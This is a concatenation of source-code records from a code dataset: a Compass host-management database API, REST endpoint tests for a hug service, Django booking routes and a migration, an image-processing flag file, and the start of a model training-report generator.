host.state.state == 'INSTALLING':\n logging.debug('installing host is not editable')\n return _conditional_exception(\n host, exception_when_not_editable\n )\n elif not host.reinstall_os:\n logging.debug(\n 'host is not editable when not reinstall os'\n )\n return _conditional_exception(\n host, exception_when_not_editable\n )\n if not user.is_admin and host.creator_id != user.id:\n logging.debug(\n 'user do not have permission to edit host'\n )\n return _conditional_exception(\n host, exception_when_not_editable\n )\n return 
True\n\n\ndef validate_host(session, host):\n if not host.hostname:\n raise exception.InvalidParameter(\n 'host %s does not set hostname' % host.name\n )\n if not host.host_networks:\n raise exception.InvalidParameter(\n 'host %s does not have any network' % host.name\n )\n mgmt_interface_set = False\n for host_network in host.host_networks:\n if host_network.is_mgmt:\n if mgmt_interface_set:\n raise exception.InvalidParameter(\n 'host %s multi interfaces set mgmt ' % host.name\n )\n if host_network.is_promiscuous:\n raise exception.InvalidParameter(\n 'host %s interface %s is mgmt but promiscuous' % (\n host.name, host_network.interface\n )\n )\n mgmt_interface_set = True\n if not mgmt_interface_set:\n raise exception.InvalidParameter(\n 'host %s has no mgmt interface' % host.name\n )\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(name=utils.check_name)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef _update_host(session, user, host_id, **kwargs):\n \"\"\"Update a host internal.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(\n session, host, user,\n reinstall_os_set=kwargs.get('reinstall_os', False)\n )\n return utils.update_db_object(session, host, **kwargs)\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST\n)\ndef update_host(host_id, user=None, session=None, **kwargs):\n \"\"\"Update a host.\"\"\"\n return _update_host(session, user, host_id=host_id, **kwargs)\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST\n)\ndef update_hosts(data=[], user=None, session=None):\n hosts = []\n for host_data in data:\n hosts.append(_update_host(session, user, **host_data))\n return hosts\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST\n)\n@utils.wrap_to_dict(\n RESP_FIELDS + ['status', 'host'],\n host=RESP_FIELDS\n)\ndef del_host(\n host_id, force=False, from_database_only=False,\n user=None, session=None, **kwargs\n):\n \"\"\"Delete a host.\"\"\"\n from compass.db.api import cluster as cluster_api\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n if host.state.state != 'UNINITIALIZED' and force:\n host.state.state = 'ERROR'\n is_host_editable(\n session, host, user,\n reinstall_os_set=True\n )\n cluster_ids = []\n for clusterhost in host.clusterhosts:\n if clusterhost.state.state != 'UNINITIALIZED' and force:\n clusterhost.state.state = 'ERROR'\n cluster_api.is_cluster_editable(\n session, clusterhost.cluster, user,\n reinstall_distributed_system_set=True\n )\n cluster_ids.append(clusterhost.cluster_id)\n\n if host.state.state == 'UNINITIALIZED' or from_database_only:\n return utils.del_db_object(session, host)\n else:\n logging.info(\n 'send del host %s task to celery', host_id\n )\n from compass.tasks import client as celery_client\n celery_client.celery.send_task(\n 'compass.tasks.delete_host',\n (\n user.email, host_id, cluster_ids\n )\n )\n return {\n 'status': 'delete action sent',\n 'host': host,\n }\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef get_host_config(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host config.\"\"\"\n return utils.get_db_object(\n session, 
models.Host, id=host_id\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_DEPLOYED_CONFIG_FIELDS)\ndef get_host_deployed_config(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host deployed config.\"\"\"\n return utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n\n@utils.replace_filters(\n os_config='deployed_os_config'\n)\n@utils.supported_filters(\n UPDATED_DEPLOYED_CONFIG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef update_host_deployed_config(host_id, user=None, session=None, **kwargs):\n \"\"\"Update host deployed config.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(session, host, user)\n is_host_validated(session, host)\n return utils.update_db_object(session, host, **kwargs)\n\n\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef _update_host_config(session, user, host, **kwargs):\n \"\"\"Update host config.\"\"\"\n is_host_editable(session, host, user)\n return utils.update_db_object(session, host, **kwargs)\n\n\n@utils.replace_filters(\n os_config='put_os_config'\n)\n@utils.supported_filters(\n UPDATED_CONFIG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_CONFIG\n)\ndef update_host_config(host_id, user=None, session=None, **kwargs):\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n def os_config_validates(config):\n metadata_api.validate_os_config(\n session, config, os_id=host.os_id\n )\n\n @utils.input_validates(\n put_os_config=os_config_validates,\n )\n def update_config_internal(host, **in_kwargs):\n return _update_host_config(\n session, user, host, **kwargs\n )\n\n return update_config_internal(\n host, **kwargs\n )\n\n\n@utils.replace_filters(\n os_config='patched_os_config'\n)\n@utils.supported_filters(\n PATCHED_CONFIG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_CONFIG\n)\ndef patch_host_config(host_id, user=None, session=None, **kwargs):\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n def os_config_validates(config):\n metadata_api.validate_os_config(\n session, config, os_id=host.os_id\n )\n\n @utils.output_validates(\n os_config=os_config_validates,\n )\n def patch_config_internal(host, **in_kwargs):\n return _update_host_config(\n session, user, host, **in_kwargs\n )\n\n return patch_config_internal(\n host, **kwargs\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef del_host_config(host_id, user=None, session=None):\n \"\"\"delete a host config.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(session, host, user)\n return utils.update_db_object(\n session, host, os_config={}, config_validated=False\n )\n\n\n@utils.supported_filters(\n optional_support_keys=SUPPORTED_NETOWORK_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef 
list_host_networks(host_id, user=None, session=None, **filters):\n \"\"\"Get host networks.\"\"\"\n return utils.list_db_objects(\n session, models.HostNetwork,\n host_id=host_id, **filters\n )\n\n\n@utils.supported_filters(\n optional_support_keys=SUPPORTED_NETOWORK_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef list_hostnetworks(user=None, session=None, **filters):\n \"\"\"Get host networks.\"\"\"\n return utils.list_db_objects(\n session, models.HostNetwork, **filters\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef get_host_network(\n host_id, host_network_id,\n user=None, session=None, **kwargs\n):\n \"\"\"Get host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n if host_network.host_id != host_id:\n raise exception.RecordNotExists(\n 'host %s does not own host network %s' % (\n host_id, host_network_id\n )\n )\n return host_network\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef get_hostnetwork(host_network_id, user=None, session=None, **kwargs):\n \"\"\"Get host network.\"\"\"\n return utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n\n\n@utils.supported_filters(\n ADDED_NETWORK_FIELDS,\n optional_support_keys=OPTIONAL_ADDED_NETWORK_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(\n ip=utils.check_ip\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef _add_host_network(\n session, user, host_id, exception_when_existing=True,\n interface=None, ip=None, **kwargs\n):\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(session, host, user)\n return utils.add_db_object(\n session, models.HostNetwork,\n exception_when_existing,\n host_id, interface, ip=ip, **kwargs\n )\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef add_host_network(\n host_id, exception_when_existing=True,\n interface=None, user=None, session=None, **kwargs\n):\n \"\"\"Create a host network.\"\"\"\n return _add_host_network(\n session, user, host_id, exception_when_existing,\n interface=interface, **kwargs\n )\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef add_host_networks(\n exception_when_existing=False,\n data=[], user=None, session=None\n):\n \"\"\"Create host networks.\"\"\"\n hosts = []\n failed_hosts = []\n for host_data in data:\n host_id = host_data['host_id']\n networks = host_data['networks']\n host_networks = []\n failed_host_networks = []\n for network in networks:\n ip_int = long(netaddr.IPAddress(network['ip']))\n host_network = utils.get_db_object(\n session, models.HostNetwork, False,\n ip_int=ip_int\n )\n if (\n host_network and not (\n host_network.host_id == host_id and\n host_network.interface == network['interface']\n )\n ):\n logging.error('ip %s exists in host network %s' % (\n network['ip'], host_network.id\n ))\n failed_host_networks.append(network)\n else:\n host_networks.append(_add_host_network(\n session, user, host_id, exception_when_existing,\n **network\n ))\n 
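# keep per-host bookkeeping: networks added above vs. networks that failed\n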
if host_networks:\n hosts.append({'host_id': host_id, 'networks': host_networks})\n if failed_host_networks:\n failed_hosts.append({\n 'host_id': host_id, 'networks': failed_host_networks\n })\n return {\n 'hosts': hosts,\n 'failed_hosts': failed_hosts\n }\n\n\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef _update_host_network(\n session, user, host_network, **kwargs\n):\n is_host_editable(session, host_network.host, user)\n return utils.update_db_object(session, host_network, **kwargs)\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_NETWORK_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(\n ip=utils.check_ip\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef update_host_network(\n host_id, host_network_id, user=None, session=None, **kwargs\n):\n \"\"\"Update a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n if host_network.host_id != host_id:\n raise exception.RecordNotExists(\n 'host %s does not own host network %s' % (\n host_id, host_network_id\n )\n )\n return _update_host_network(\n session, user, host_network, **kwargs\n )\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_NETWORK_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(\n ip=utils.check_ip\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef update_hostnetwork(host_network_id, user=None, session=None, **kwargs):\n \"\"\"Update a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork, id=host_network_id\n )\n return _update_host_network(\n session, user, host_network, **kwargs\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST_NETWORK\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef del_host_network(\n host_id, host_network_id, user=None,\n session=None, **kwargs\n):\n \"\"\"Delete a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n if host_network.host_id != host_id:\n raise exception.RecordNotExists(\n 'host %s does not own host network %s' % (\n host_id, host_network_id\n )\n )\n is_host_editable(session, host_network.host, user)\n return utils.del_db_object(session, host_network)\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST_NETWORK\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef del_hostnetwork(host_network_id, user=None, session=None, **kwargs):\n \"\"\"Delete a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork, id=host_network_id\n )\n is_host_editable(session, host_network.host, user)\n return utils.del_db_object(session, host_network)\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_GET_HOST_STATE\n)\n@utils.wrap_to_dict(RESP_STATE_FIELDS)\ndef get_host_state(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host state info.\"\"\"\n return utils.get_db_object(\n session, models.Host, id=host_id\n ).state_dict()\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_STATE_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n 
permission.PERMISSION_UPDATE_HOST_STATE\n)\n@utils.wrap_to_dict(RESP_STATE_FIELDS)\ndef update_host_state(host_id, user=None, session=None, **kwargs):\n \"\"\"Update a host state.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n utils.update_db_object(session, host.state, **kwargs)\n return host.state_dict()\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_STATE_INTERNAL_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST_STATE\n)\n@utils.wrap_to_dict(['status', 'host'])\ndef update_host_state_internal(\n hostname, from_database_only=False,\n user=None, session=None, **kwargs\n):\n \"\"\"Update a host state.\"\"\"\n if isinstance(hostname, (int, long)):\n host = utils.get_db_object(\n session, models.Host, id=hostname\n )\n else:\n host = utils.get_db_object(\n session, models.Host, name=hostname\n )\n if 'ready' in kwargs and kwargs['ready'] and not host.state.ready:\n ready_triggered = True\n else:\n ready_triggered = False\n clusterhost_ready = {}\n cluster_os_ready = {}\n if ready_triggered:\n for clusterhost in host.clusterhosts:\n cluster = clusterhost.cluster\n if cluster.distributed_system:\n clusterhost_ready[cluster.id] = False\n else:\n clusterhost_ready[cluster.id] = True\n all_os_ready = True\n for clusterhost_in_cluster in cluster.clusterhosts:\n host_in_cluster = clusterhost_in_cluster.host\n if host_in_cluster.id == host.id:\n continue\n if not host_in_cluster.state.ready:\n all_os_ready = False\n cluster_os_ready[cluster.id] = all_os_ready\n logging.info('host %s ready: %s', hostname, ready_triggered)\n logging.info(\"clusterhost_ready is: %s\", clusterhost_ready)\n logging.info(\"cluster_os_ready is %s\", cluster_os_ready)\n\n if not ready_triggered or from_database_only:\n logging.info('%s state is set to %s', host.name, kwargs)\n utils.update_db_object(session, host.state, **kwargs)\n if not host.state.ready:\n for clusterhost in host.clusterhosts:\n utils.update_db_object(\n session, clusterhost.state, ready=False\n )\n utils.update_db_object(\n session, clusterhost.cluster.state, ready=False\n )\n status = '%s state is updated' % host.name\n else:\n from compass.tasks import client as celery_client\n celery_client.celery.send_task(\n 'compass.tasks.os_installed',\n (\n host.id, clusterhost_ready,\n cluster_os_ready\n )\n )\n status = '%s: clusterhost ready %s cluster os ready %s' % (\n host.name, clusterhost_ready, cluster_os_ready\n )\n logging.info('action status: %s', status)\n return {\n 'status': status,\n 'host': host.state_dict()\n }\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef get_host_log_histories(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host log history.\"\"\"\n return utils.list_db_objects(\n session, models.HostLogHistory, id=host_id\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef get_host_log_history(host_id, filename, user=None, session=None, **kwargs):\n \"\"\"Get host log history.\"\"\"\n return utils.get_db_object(\n session, models.HostLogHistory, id=host_id, filename=filename\n )\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_LOG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef update_host_log_history(\n host_id, filename, user=None,\n session=None, **kwargs\n):\n \"\"\"Update a host log 
history.\"\"\"\n host_log_history = utils.get_db_object(\n session, models.HostLogHistory, id=host_id, filename=filename\n )\n return utils.update_db_object(session, host_log_history, **kwargs)\n\n\n@utils.supported_filters(\n ADDED_LOG_FIELDS,\n optional_support_keys=UPDATED_LOG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef add_host_log_history(\n host_id, exception_when_existing=False,\n filename=None, user=None, session=None, **kwargs\n):\n \"\"\"add a host log history.\"\"\"\n return utils.add_db_object(\n session, models.HostLogHistory, exception_when_existing,\n host_id, filename, **kwargs\n )\n\n\n@utils.supported_filters(optional_support_keys=['poweron'])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEPLOY_HOST\n)\n@utils.wrap_to_dict(\n RESP_DEPLOY_FIELDS,\n host=RESP_CONFIG_FIELDS\n)\ndef poweron_host(\n host_id, poweron={}, user=None, session=None, **kwargs\n):\n \"\"\"power on host.\"\"\"\n from compass.tasks import client as celery_client\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_validated(session, host)\n celery_client.celery.send_task(\n 'compass.tasks.poweron_host',\n (host_id,)\n )\n return {\n 'status': 'poweron %s action sent' % host.name,\n 'host': host\n }\n\n\n@utils.supported_filters(optional_support_keys=['poweroff'])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEPLOY_HOST\n)\n@utils.wrap_to_dict(\n RESP_DEPLOY_FIELDS,\n host=RESP_CONFIG_FIELDS\n)\ndef poweroff_host(\n host_id, poweroff={}, user=None, session=None, **kwargs\n):\n \"\"\"power off host.\"\"\"\n from compass.tasks import client as celery_client\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_validated(session, host)\n celery_client.celery.send_task(\n 'compass.tasks.poweroff_host',\n (host_id,)\n )\n return {\n 'status': 'poweroff %s action sent' % host.name,\n 'host': host\n }\n\n\n@utils.supported_filters(optional_support_keys=['reset'])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEPLOY_HOST\n)\n@utils.wrap_to_dict(\n RESP_DEPLOY_FIELDS,\n host=RESP_CONFIG_FIELDS\n)\ndef reset_host(\n host_id, reset={}, user=None, session=None, **kwargs\n):\n \"\"\"reset host.\"\"\"\n from compass.tasks import client as celery_client\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_validated(session, host)\n celery_client.celery.send_task(\n 'compass.tasks.reset_host',\n (host_id,)\n )\n return {\n 'status': 'reset %s action sent' % host.name,\n 'host': host\n }\n","sub_path":"compass/db/api/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":29167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"35255499","text":"import os\nimport requests\nimport time\nimport apphelpers.sessions as sessionslib\n\nfrom .app.models import globalgroups, sitegroups\n\nfrom converge import settings\n\n\nclass urls:\n base = 'http://127.0.0.1:8000/'\n echo = base + 'echo'\n echo_for_registered = base + 'secure-echo'\n echo_for_groups = base + 'echo-groups'\n echo_for_sitegroups = base + 'sites/1/echo-groups'\n\n\npid_path = 'tests/run/app.pid'\n\nsessiondb_conn = dict(host=settings.SESSIONSDB_HOST,\n port=settings.SESSIONSDB_PORT,\n password=settings.SESSIONSDB_PASSWD,\n db=settings.SESSIONSDB_NO)\nsessionsdb = 
sessionslib.SessionDBHandler(sessiondb_conn)\nsessionsdb.destroy_all()\n\n\ndef gunicorn_setup_module(): # not working\n if os.path.exists(pid_path):\n os.remove(pid_path)\n cmd = f'gunicorn tests.service:__hug_wsgi__ -p {pid_path} -D'\n os.system(cmd)\n for i in range(10):\n if os.path.exists(pid_path):\n time.sleep(2)\n break\n\n\ndef gunicorn_teardown_module():\n if os.path.exists(pid_path):\n cmd = f'kill -9 `cat {pid_path}`'\n os.system(cmd)\n\n\ndef test_get():\n word = 'hello'\n url = urls.echo + '/' + word\n assert requests.get(url).json() == word\n\n\ndef test_get_params():\n word = 'hello'\n url = urls.echo + '/' + word\n params = {'word': word}\n assert requests.get(url, params=params).json() == word\n\n\ndef test_get_multi_params():\n nums = [3, 5]\n url = urls.base + 'add'\n params = {'nums': nums}\n assert requests.get(url, params=params).json() == sum(nums)\n\n\ndef test_post():\n word = 'hello'\n url = urls.echo\n assert requests.post(url, json={'word': word}).json() == word\n\n\ndef test_echo_for_registered():\n word = 'hello'\n headers = {'NoAuthorization': 'Header'}\n url = urls.echo_for_registered + '/' + word\n resp = requests.get(url, headers=headers)\n assert resp.status_code == 401\n\n\ndef test_user_id():\n uid = 101\n d = dict(uid=uid, groups=[])\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n\n word = 'hello'\n url = urls.echo + '/' + word\n assert requests.get(url, headers=headers).json() == ('%s:%s' % (uid, word))\n\n url = urls.base + 'me/uid'\n\n data = {'uid': None}\n resp = requests.post(url, json=data, headers=headers)\n assert resp.json() == uid\n\n data = {'uid': 1} # invalid claim\n resp = requests.post(url, json=data, headers=headers)\n assert resp.json() == uid\n\n data = {'uid': uid}\n resp = requests.post(url, json=data, headers=headers)\n assert resp.json() == uid\n\n\ndef test_group_access():\n # 1. No group\n uid = 111\n groups = []\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_groups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 2. Forbidden group\n uid = 112\n groups = [globalgroups.forbidden.value]\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_groups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 3. Access group\n uid = 113\n groups = [globalgroups.privileged.value]\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 200\n\n # 4. Other groups\n uid = 112\n groups = [globalgroups.others.value]\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_groups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n\ndef test_not_found():\n uid = 117\n d = dict(uid=uid, groups=[], site_groups={})\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n\n url = urls.base + 'snakes/viper'\n assert requests.get(url).status_code == 404\n\n url = urls.base + 'sites/1/snakes/viper'\n assert requests.get(url, headers=headers).status_code == 404\n\n\ndef test_site_group_access():\n # 1. 
No group\n uid = 114\n groups = []\n site_groups = {}\n d = dict(uid=uid, groups=groups, site_groups=site_groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_sitegroups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 2. Forbidden group\n uid = 115\n groups = [globalgroups.forbidden.value]\n site_groups = {1: [sitegroups.forbidden.value]}\n d = dict(uid=uid, groups=groups, site_groups=site_groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_sitegroups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 3. Access group\n uid = 116\n groups = [globalgroups.privileged.value]\n site_groups = {1: [sitegroups.privileged.value]}\n d = dict(uid=uid, groups=groups, site_groups=site_groups)\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 200\n\n\ndef test_request_access():\n url = urls.base + 'request-and-body'\n req = requests.post(url, data={'z': 1}, headers={'testheader': 'testheader-value'})\n resp = req.json()\n assert 'testheader'.upper() in resp['headers']\n assert resp['body'] == {'z': '1'}\n\n\ndef test_raw_request():\n url = urls.base + 'request-raw-body'\n req = requests.post(url, data={'z': 1}, headers={'testheader': 'testheader-value'})\n resp = req.json()\n assert 'testheader'.upper() in resp['headers']\n","sub_path":"tests/test_rest.py","file_name":"test_rest.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"168923366","text":"\"\"\"\nBooking app urls module\n\"\"\"\nfrom django.urls import path\n\nfrom booking import views\n\nurlpatterns = [\n path('users/', views.CustomUserList.as_view(), name='user-list'),\n path('users//', views.CustomUserDetail.as_view(), name='user-detail'),\n path('halls/', views.HallsList.as_view(), name='hall-list'),\n path('halls//', views.HallsDetail.as_view(), name='hall-detail'),\n path('movies/', views.MoviesListView.as_view(), name='movie-list'),\n path('movies//', views.MoviesDetail.as_view(), name='movie-detail'),\n path('showings/', views.ShowingsListView.as_view(), name='showing-list'),\n path('showings//', views.ShowingsDetail.as_view(), name='showing-detail'),\n path('tickets/', views.TicketsListView.as_view(), name='ticket-list'),\n path('tickets//', views.TicketsDetail.as_view(), name='ticket-detail'),\n path('tickets//pay/', views.PayForTicket.as_view(), name='pay'),\n]\n","sub_path":"booking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177214664","text":"# -*- coding: utf-8 -*-\ndebugflag = False #when it is True, every flag is treated as True\nimgflag = True #the original image\nbinaryimgflag = False #image produced by plain or adaptive binarization\nerodimgflag = False #image obtained after erosion\ncontoursflag = False #bounding info of the note contours\ncontimgflag = False #draw the contours on this image\nrectimgflag = True #draw the minimal bounding rectangles\nsizimgflag = False #note images scaled to a standard size\ncoorflag = False #bottom-left coordinates of the notes\nfigureflag = False #staff middle-line information, r and theta\ninfoflag = False #position and shape information of the notes\nbegincoor = [315,380] #marker position of the start signal","sub_path":"composer/globallist.py","file_name":"globallist.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"359854491","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass 
Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0023_auto_20151026_1304'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='massive_itinerary',\n name='lugar',\n field=models.TextField(help_text=b'Opcionalmente puedes asociar este itinerario a un punto espec\\xc3\\xadfico.', max_length=200, null=True, verbose_name=b'Duraci\\xc3\\xb3n', blank=True),\n ),\n migrations.AlterField(\n model_name='events',\n name='start_time',\n field=models.TimeField(default=datetime.time(14, 55, 26, 754029), help_text=b'Indica la hora de inicio del evento', verbose_name=b'Hora de inicio'),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='description',\n field=models.TextField(default='', verbose_name=b'Descripci\\xc3\\xb3n'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='duration',\n field=models.TextField(help_text=b'Cuanto va a durar este punto del itinerario?', max_length=200, null=True, verbose_name=b'Duraci\\xc3\\xb3n', blank=True),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='name',\n field=models.CharField(help_text=b'T\\xc3\\xadtulo de este evento en el itinerario', max_length=100, verbose_name=b'T\\xc3\\xadtulo'),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='start_date',\n field=models.DateField(help_text=b'Cuando?', verbose_name=b'Fecha'),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='start_time',\n field=models.TimeField(help_text=b'A que hora?', null=True, verbose_name=b'Hora', blank=True),\n ),\n migrations.AlterField(\n model_name='my_groups',\n name='color',\n field=models.CharField(default=b'E38A33', max_length=25),\n ),\n ]\n","sub_path":"project/app/migrations/0024_auto_20151026_1455.py","file_name":"0024_auto_20151026_1455.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"339311621","text":"\"\"\"\nModule which contain models training report generator function\n\"\"\"\n\nimport csv\nimport json\nimport os\nimport shutil\nimport uuid\nfrom collections import OrderedDict\n\nimport redis\nfrom pandas import DataFrame\n\nfrom MLLogger import BaseMLLogger\nfrom exception_handler import MLExceptionHandler\nfrom general_helper import (\n get_file_from_blob, get_oauth, fetch_token, get_file_info_from_blob,\n get_multipart_object, post_data_to_blob, logging_exception_message,\n make_directory\n)\nfrom learner.algorithms import CLASSIFIER, REGRESSOR\nfrom learner.plotters import radar_plot\nfrom mass_transit.MTMessageProcessor import PureConsumer, PurePublisher\nfrom mass_transit.mass_transit_constants import (\n GENERATE_REPORT, REPORT_GENERATED, TRAINING_REPORT_GENERATION_FAILED\n)\nfrom messages import (\n training_report_generated_message, training_report_generation_failed\n)\nfrom report_helper.TMP_text import (\n TRAINING_CSV_METRICS, 